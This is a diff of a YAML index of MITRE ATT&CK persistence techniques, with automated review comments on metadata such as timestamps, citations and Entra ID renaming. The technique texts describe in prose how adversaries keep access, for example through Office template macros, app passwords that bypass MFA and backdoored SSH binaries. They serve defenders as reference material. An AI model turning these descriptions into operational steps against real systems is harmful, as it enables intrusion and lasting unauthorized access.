- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.001
- url: https://attack.mitre.org/techniques/T1137/001
- - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
- description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
- Retrieved July 3, 2017.
- source_name: Microsoft Change Normal Template
- - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
- description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
- Retrieved July 3, 2017.
- source_name: MSDN VBA in Office
- - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
- description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
- Retrieved July 3, 2017.
- source_name: enigma0x3 normal.dotm
- - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
- description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
- Retrieved July 3, 2017.
- source_name: Hexacorn Office Template Macros
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- - source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
- description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
- Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:01:35.918Z'
name: 'Office Application Startup: Office Template Macros.'
description: "Adversaries may abuse Microsoft Office templates to obtain persistence
on a compromised system. Microsoft Office contains templates that are part
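Review bot: the whole block removed at the top of this object (`x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and all of `external_references`) reappears further down the same object in a later hunk with the references in a different order, so this hunk is almost entirely a move. The only content change in the moved material is the platform list, which becomes `Windows` and `Office Suite` where it reappears. Unrelated but visible in the context here: `name: 'Office Application Startup: Office Template Macros.'` carries a trailing period that none of the other technique names in this diff have; worth a check against the upstream object.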
@@ -31308,6 +31670,7 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: 'Many Office-related persistence mechanisms require changes
to the Registry and for binaries, files, or scripts to be written to disk
or existing files modified to include malicious scripts. Collect events related
@@ -31317,9 +31680,13 @@ persistence:
also be investigated since the base templates should likely not contain VBA
macros. Changes to the Office macro security settings should also be investigated.(Citation:
GlobalDotName Jun 2019)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -31327,11 +31694,47 @@ persistence:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+ created: '2019-11-07T20:29:17.788Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/001
+ external_id: T1137.001
+ - source_name: MSDN VBA in Office
+ description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+ Retrieved July 3, 2017.
+ url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+ - source_name: Hexacorn Office Template Macros
+ description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+ Retrieved July 3, 2017.
+ url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+ - source_name: Microsoft Change Normal Template
+ description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+ Retrieved July 3, 2017.
+ url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+ - source_name: enigma0x3 normal.dotm
+ description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+ Retrieved July 3, 2017.
+ url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+ - source_name: CrowdStrike Outlook Forms
+ description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+ Movement and Persistence. Retrieved February 5, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.001
atomic_tests: []
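Review bot: `x_mitre_permissions_required` (`User`, `Administrator`) is dropped from T1137.001 in this hunk and not re-added, while other objects in this diff keep theirs (T1546.005, T1546.012, T1574.005, T1547.015, T1205.001). Anything that filters or groups techniques by required permissions will now silently omit T1137.001; if the upstream object no longer carries the field, note it in the PR description so the inconsistency across objects is understood. Minor: the Hexacorn reference is re-added with a plain-`http` URL while the Microsoft references elsewhere in this diff were moved to `https`.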
T1546.009:
@@ -31363,7 +31766,7 @@ persistence:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -31411,13 +31814,11 @@ persistence:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -31430,16 +31831,16 @@ persistence:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -31451,16 +31852,16 @@ persistence:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
@@ -31515,7 +31916,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542:
technique:
@@ -31576,7 +31976,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.015:
technique:
@@ -31652,7 +32051,7 @@ persistence:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -31680,8 +32079,6 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1205.001:
@@ -31707,7 +32104,7 @@ persistence:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -31732,23 +32129,21 @@ persistence:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
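Review bot: the rename is rendered as "Azure / Entra ID" in the first `+` line of this hunk, but as "Entra ID" everywhere else in this diff (including the T1098.001 text in the next hunk and the T1078.004 and T1098.005 descriptions above). If this wording comes verbatim from upstream it should stay as-is; if it was hand-edited, align it with the rest. Either way, the `(Citation: Demystifying Azure AD Service Principals)` key must keep its old name for the same reason as the other citation keys in this file.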
@@ -31758,11 +32153,15 @@ persistence:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
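Review bot: the new sentence introduces two citation keys, `Permiso Scattered Spider 2023` and `Lacework AI Resource Hijacking 2024`, and the next hunk adds two more, `Mandiant APT42 Operations 2024` and `Microsoft Entra ID App Passwords`. Each needs a matching `source_name` entry under this object's `external_references`, which only begins in the truncated final hunk of this diff, so the links cannot be verified from what is shown; please confirm all four resolve, otherwise the rendered description will carry dangling citations.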
@@ -31773,12 +32172,19 @@ persistence:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
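Review bot: the new app-password paragraph states that an added app password can sidestep MFA and stays valid after a primary password reset, yet nothing else in this hunk (or in the data-source additions below) mentions app-password registration as something to monitor; the unchanged detection text still speaks only of Service Principal and Application modifications. Worth flagging upstream so the detection field catches up with the description. The `+ x_mitre_attack_spec_version: 3.2.0` inserted after `kill_chain_phases` is the same key removed from the bottom of the object later in this diff, so that part is key reordering rather than a value change.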
@@ -31787,6 +32193,7 @@ persistence:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -31795,13 +32202,16 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
@@ -31827,10 +32237,18 @@ persistence:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
@@ -31839,10 +32257,20 @@ persistence:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -31859,14 +32287,11 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
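Review bot: the `modified` timestamp for T1556.008 moves backwards (`2023-10-31T14:00:00.188Z` to `2023-05-04T18:02:51.318Z`), which normally signals the generator read an older bundle. Here it is more likely a correction: every old value being replaced in this diff shares the same `T14:00:00.188Z` suffix (also on T1546.001, T1546.014, T1574.010 and T1547.006 below), which looks like a bulk rewrite rather than a real edit time, while the new values carry distinct fractional seconds. Please confirm in the PR description which STIX bundle version was used so the backward moves are understood as intentional. The three removed keys (`x_mitre_attack_spec_version`, `x_mitre_modified_by_ref`, `spec_version`) reappear elsewhere for the same technique except `spec_version`, which is dropped for every object in this diff; if consumers read `spec_version`, that needs a note.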
@@ -31941,7 +32366,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -32030,24 +32454,27 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1554:
technique:
- modified: '2024-04-16T13:03:40.824Z'
+ modified: '2024-10-12T16:52:46.067Z'
name: Compromise Host Software Binary
description: |-
Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
- Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+ Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+ After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- CrowdStrike Falcon OverWatch
+ - Liran Ravich, CardinalOps
+ - Jamie Williams (U ω U), PANW Unit 42
x_mitre_deprecated: false
x_mitre_detection: "Collect and analyze signing certificate metadata and check
signature validity on software that executes within the environment. Look
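Review bot: the rewritten description line carries over the upstream typo `persistence though modifications` (should be `through`); because this text is synced from ATT&CK, the fix has to land upstream rather than in this index. The added `yum-versionlock` / `versionlock.list` detail is a useful concrete detection hook: a change to `versionlock.list` pinning one of the binaries the description names (for example an SSH client) is exactly the kind of event the technique's existing `File: File Modification` data source should surface, and it would be good to see the detection text reference it.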
@@ -32061,7 +32488,7 @@ persistence:
- Linux
- macOS
- Windows
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Deletion'
- 'File: File Modification'
@@ -32076,6 +32503,11 @@ persistence:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1554
external_id: T1554
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Unit42 Banking Trojans Hooking 2022
description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
Financially Motivated Malware Became Infrastructure. Retrieved September
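Review bot: the new `Google Cloud Mandiant UNC3886 2024` reference has a stray leading space inside the quoted description (`" Punsaen Boonyakarn, Shawn Chew, ...`), unlike every other entry in this file; trim it, or fix the upstream entry, so the rendered citation text is consistent.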
@@ -32089,11 +32521,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -32119,7 +32550,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -32133,7 +32563,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -32160,8 +32589,8 @@ persistence:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -32172,7 +32601,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1546.014:
@@ -32213,7 +32643,7 @@ persistence:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -32233,12 +32663,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -32292,11 +32721,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -32383,9 +32811,9 @@ persistence:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -32398,12 +32826,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
